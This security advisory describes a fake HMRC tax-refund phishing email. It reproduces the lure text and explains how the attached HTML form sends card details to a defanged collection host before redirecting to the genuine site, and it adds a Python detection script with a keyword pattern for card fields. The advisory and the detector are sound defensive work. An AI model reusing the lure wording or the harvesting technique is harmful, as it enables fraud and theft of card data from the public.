Fake emails from HM Revenue & Customs are a phishing attempt

MX Lab, http://www.mxlab.eu, started to intercept a new phishing campaign with the subject “HM Revenue & Customs – Important Refund Notification!”.

The email is sent from the spoofed address “HM Revenue & Customs <refunds@hmrc.gov.uk>” and has the following body regarding a refund:

HM Revenue & Customs (HMRC)


Dear Sir/Madame,

After the last annual calculations of your fiscal activity we have determined that you are eligible to receive a tax refund of 379.83 GBP
Please submit the tax refund request and allow us 6-9 days in order to process it.

To access your tax refund, please follow the steps bellow:

– download the Tax Refund Form attached to this email
– open it in a browser (recommended internet explorer)
– follow the instructions on your screen

NOTE: Fill in all required fields, otherwise the refund process will be canceled.

A refund can be delayed for a variety of reasons. For example submitting invalid records or applying after the deadline.

Revenue and Tax Administrator

HM Revenue & Customs
Tax Credit Office
PO Box 1970
L75 1WX


© Crown Copyright, HM Revenue & Customs

Attached is an HTML page named HM Revenue&Customs  – Refund Form.html. Opening HM Revenue&Customs  – Refund Form.html displays an HTML web form styled with the layout of HM Revenue & Customs.

The form data, including name, birthday, VISA card number, security code and expiration date, is submitted to hxxp://rosuik.ru/images/template/files/html/, after which the browser is redirected to http://search2.hmrc.gov.uk/kb5/hmrc/contactus/home.page.
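The attachment described above is a local HTML form that posts card details to a host unrelated to the brand it imitates. As an added example (not MX Lab's code), this Python check for a mail gateway flags such attachments; the sample HTML, its field names, the `collector.example` host and the keyword heuristic are constructed assumptions.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse
import re

# Assumed heuristic: field names that suggest payment-card or identity data.
SENSITIVE = re.compile(r"card|cvv|cvc|secur|expir|birth|dob", re.I)

# Constructed sample attachment (placeholder host, hypothetical field names).
SAMPLE = """<html><body>
<form method="post" action="http://collector.example/files/html/">
<input name="fullname"><input name="birthday">
<input name="cardnumber"><input name="securitycode"><input name="expirydate">
<input type="submit" value="Submit">
</form></body></html>"""

class FormCollector(HTMLParser):
    """Collect each <form> action together with the names of its fields."""
    def __init__(self):
        super().__init__()
        self.forms = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.forms.append({"action": a.get("action") or "", "fields": []})
        elif tag in ("input", "select", "textarea") and self.forms:
            self.forms[-1]["fields"].append(a.get("name") or a.get("id") or "")

def off_domain(action, expected_domain):
    """True when the form action names a host outside the expected domain."""
    host = (urlparse(action).hostname or "").lower()
    if not host:
        return False  # relative or empty action: no remote host is named
    return not (host == expected_domain or host.endswith("." + expected_domain))

def scan_attachment(html, expected_domain):
    """Return forms that send sensitive fields to a host outside expected_domain."""
    parser = FormCollector()
    parser.feed(html)
    findings = []
    for form in parser.forms:
        sensitive = sorted(f for f in form["fields"] if SENSITIVE.search(f))
        if off_domain(form["action"], expected_domain) and sensitive:
            findings.append({"action": form["action"], "sensitive_fields": sensitive})
    return findings

if __name__ == "__main__":
    print(scan_attachment(SAMPLE, "hmrc.gov.uk"))
```

The expected domain is taken from the sender the message claims to be, so a form that posts anywhere else is reported even when the page later redirects to the genuine site.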

MX Lab advises not to follow the instructions in this email because they are an attempt to steal valuable personal data that can and will be abused. Banks and other institutions will never ask you to open a local HTML page and fill in such details.